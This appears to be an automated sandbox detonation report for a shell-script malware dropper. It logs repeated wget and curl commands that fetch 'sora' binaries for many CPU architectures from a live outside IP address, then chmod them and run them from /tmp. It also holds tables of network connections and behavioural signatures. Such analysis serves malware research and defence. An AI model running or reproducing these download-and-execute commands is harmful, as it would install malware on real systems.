| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-18 02:04
Reported
2024-10-18 02:06
Platform
debian9-mipsel-20240729-en
Max time kernel
28s
Max time network
29s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh | N/A |
Processes
/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
[/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |